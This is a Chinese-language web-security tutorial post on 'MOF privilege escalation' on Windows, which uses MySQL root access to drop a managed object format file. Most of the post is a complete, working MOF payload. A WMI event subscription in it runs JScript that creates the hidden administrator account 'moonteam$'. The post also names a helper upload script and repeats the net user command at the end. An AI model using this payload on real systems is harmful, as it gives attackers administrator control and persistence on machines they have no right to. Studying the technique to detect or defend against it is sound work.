1. 首页
  2. 渗透编程

[原创]WEB安全第六章提权篇12 mof提权

WEB安全第六章提权篇12 mof提权

1、mof是什么
托管对象格式 (MOF) 文件是创建和注册提供程序、事件类别和事件的简便方法。在 MOF 文件中创建类实例和类定义后,可以对该文件进行编译。编译 MOF 文件将在 CIM 储存库中注册所有的类定义和实例。之后,提供程序、事件类别和事件信息便可由 便可由 WMI 和 Visual Studio Analyzer 使用。 在 MOF 文件中创建提供程序、事件类别和事件类的实例,并且定义想要分析的自定义对象,之后,就可以对该文件进行编译
2、mof提权的原理:
mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做”托管对象格式”其作用是每隔五秒就会去监控进程创建和死亡。
其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。
3、modf提权过程
mof文件

[php]
mof文件
<h1>pragma namespace("\\.\root\subscription")</h1>
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user moonteam$ xxx12456 /add &amp;&amp; net localgroup administrators moonteam$ /add\")";
};

instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};

[/php]

使用脚本提权
http://www.demoasp.com/mof.php
填写好mysq的账号和密码
文件会自动写到good目录下

[原创]WEB安全第六章提权篇12 mof提权

net.exe user moonteam$ xxx12456 /add && net localgroup administrators moonteam$ /add

[原创]WEB安全第六章提权篇12 mof提权
[原创]WEB安全第六章提权篇12 mof提权

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/450.html

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息